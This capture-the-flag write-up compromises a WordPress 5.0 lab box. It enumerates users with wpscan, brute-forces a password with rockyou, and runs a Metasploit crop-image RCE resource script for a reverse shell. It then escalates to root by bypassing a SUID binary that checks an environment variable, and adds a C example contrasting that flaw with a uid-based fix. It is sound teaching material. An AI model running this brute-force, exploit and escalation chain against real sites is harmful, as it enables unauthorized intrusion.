# Write-up

### <mark style="color:purple;">Objectives</mark>

Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole...

***

### <mark style="color:purple;">Reconnaissance</mark>

First, we perform a port scan using **Nmap** to identify open services on the target machine. Note that `-F` only covers Nmap's 100 most common ports; a full `-p-` scan is worth running afterwards if the fast scan leaves gaps.

```bash
sudo nmap -Pn -sCV -F -T5 <ip_victim>
```

The result shows the following open ports:

* **22** (SSH)
* **80** (HTTP)
* **139** (NetBIOS)
* **445** (SMB)

When visiting port 80, we discover that the website is running **WordPress**. Upon clicking any link, we are redirected to **blog.thm**, so we add that name, mapped to the target IP, to our **/etc/hosts** file before continuing; without the mapping the virtual host is unreachable.

#### **User Enumeration:**

Browsing the blog, we identify two potential users from the names shown on the site:

* **Karen Wheeler** (username: **kwheel**)
* **Billy Joel** (username: **bjoel**)

To confirm the existence of these users and look for any other potential accounts, we use **wpscan**:

```bash
wpscan --url http://blog.thm/ --enumerate u
```

This confirms that only the two users are present.

***

### <mark style="color:purple;">Gaining a Shell</mark>

Next, we attempt to gain access to the WordPress admin panel by brute-forcing the credentials of the users. We use **wpscan** with the **rockyou.txt** wordlist:

```bash
wpscan --url http://blog.thm/ --usernames kwheel,bjoel --passwords /usr/share/wordlists/rockyou.txt
```

After approximately 17 minutes, we successfully crack **kwheel**'s password.

#### **WordPress Exploit (Version 5.0):**

Once inside the admin panel, we confirm that the WordPress version is **5.0**. Searching for vulnerabilities on **Exploit-DB**, we find an exploit targeting the **Crop-image** feature in WordPress 5.0. The exploit needs valid credentials for an account that can upload media (Author role or higher), which is why cracking **kwheel**'s password matters: an unauthenticated attacker cannot reach this code path.

The exploit suggests using **Metasploit**:

```bash
msfconsole
```

We configure the exploit with the correct parameters (RHOSTS, LHOST, RPORT, LPORT, PASSWORD, and USERNAME), making sure the requests are sent with the **blog.thm** host name since the site redirects to it, and run the module to gain a shell.
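As a concrete form of that configuration, below is a Metasploit resource script added for this write-up; it is not from the original page or from the exploit's author. It assumes the module name `exploit/multi/http/wp_crop_rce`, that **blog.thm** resolves to the target via the /etc/hosts entry added earlier, and placeholder values for the addresses and the cracked password.

```msf
# Added example: resource script for the WordPress 5.0 crop-image exploit.
# <ip_victim>, <ip_attacker> and <cracked_password> are placeholders.
use exploit/multi/http/wp_crop_rce
set RHOSTS <ip_victim>
set RPORT 80
# The site redirects to blog.thm, so the Host header must carry that name.
set VHOST blog.thm
set TARGETURI /
set USERNAME kwheel
set PASSWORD <cracked_password>
set LHOST <ip_attacker>
set LPORT 4444
run
```

Save it as, for example, `wp_crop.rc` and start it with `msfconsole -q -r wp_crop.rc`; the options can equally be typed one by one at the `msf6` prompt.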

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXc4yJhgHoMWH12Nf8pub-anyAnc_BQQ01cBMYt9x8FpzRLKls3d-5JzZ3A7e05ogcIM8R8Ekb7NpsfcizM5osCJKuX-iH6P_od8vdK1-dpBGPiq6zAB5lbD1g4A-U9mn7Vp2xLl_Q?key=hO0pUMf6FTRt0AX1m_Ki4hWP" alt=""><figcaption></figcaption></figure>

#### **Upgrading the Shell:**

Once we have access to the system, we improve the interactivity of the shell we received (it has no TTY, so tools like `su` and editors misbehave) with the following command:

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

***

### <mark style="color:purple;">Privilege Escalation</mark>

#### **Searching for user.txt:**

We perform a search for the **user.txt** file:

```bash
find / -type f -name "user.txt" 2>/dev/null
```

At this point, we realize we need to escalate privileges to access this file.

#### **SUID Search:**

We search for files with the **SUID** bit set:

```bash
find / -type f -perm -04000 -ls 2>/dev/null
```

We find a SUID-root binary named **checker**. When executed, it returns the message **"Not an Admin"**. Running it under **ltrace** shows that it reads the environment variable **admin** via `getenv("admin")` and receives **nil** (NULL), which is what triggers the rejection. The binary never verifies who is calling; it trusts a value that the unprivileged caller fully controls.

We set the **admin** variable using **export**; any non-empty assignment is enough, since the check only tests whether the variable exists:

```bash
export admin="1"
```

This bypasses the check, and because **checker** is SUID root, it continues with root privileges and gives us a root shell.
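To make the flaw in **checker** concrete, the following C program is an added example written for this write-up, not the binary's actual source. It places the environment-variable check next to a hardened version that asks the kernel for the real uid, and includes a small helper (`check_with_admin_env`, an assumption of this example) that simulates `export admin=...` in-process so both checks can be exercised without a SUID binary.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Vulnerable pattern, the one checker exhibits: the privilege decision
 * rests on an environment variable. Every byte of the environment is
 * chosen by the unprivileged caller, so this is not a check at all. */
int vulnerable_is_admin(void)
{
    /* getenv() returns NULL when the variable is absent, hence
     * "Not an Admin"; any value, even an empty one, passes. */
    return getenv("admin") != NULL;
}

/* Hardened pattern: ask the kernel who is really calling. The real uid
 * survives the SUID transition and cannot be forged from user space. */
int hardened_is_admin(void)
{
    return getuid() == 0;
}

/* Helper (this example's own): run a check with `admin` set to `value`,
 * or unset when value is NULL, and restore the environment afterwards. */
int check_with_admin_env(const char *value, int (*check)(void))
{
    int result;
    if (value != NULL)
        setenv("admin", value, 1);
    else
        unsetenv("admin");
    result = check();
    unsetenv("admin");
    return result;
}

int main(void)
{
    printf("vulnerable check, admin unset : %d\n",
           check_with_admin_env(NULL, vulnerable_is_admin));
    printf("vulnerable check, admin=1     : %d\n",
           check_with_admin_env("1", vulnerable_is_admin));
    printf("hardened check,   admin=1     : %d (real uid %u)\n",
           check_with_admin_env("1", hardened_is_admin), (unsigned)getuid());
    /* A real SUID binary would follow the check with setuid(0) and a
     * shell; the point is which of the two checks should gate that step. */
    return 0;
}
```

Compile with `gcc -Wall -o checker_demo checker_demo.c`. The vulnerable check flips from 0 to 1 as soon as the variable exists, regardless of its value; the hardened check stays 0 for an unprivileged caller no matter what the environment contains.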

#### **Finding the Flags:**

Once we have root privileges, we search for **user.txt** again and find it in a different location. We also obtain **root.txt**, completing the machine.
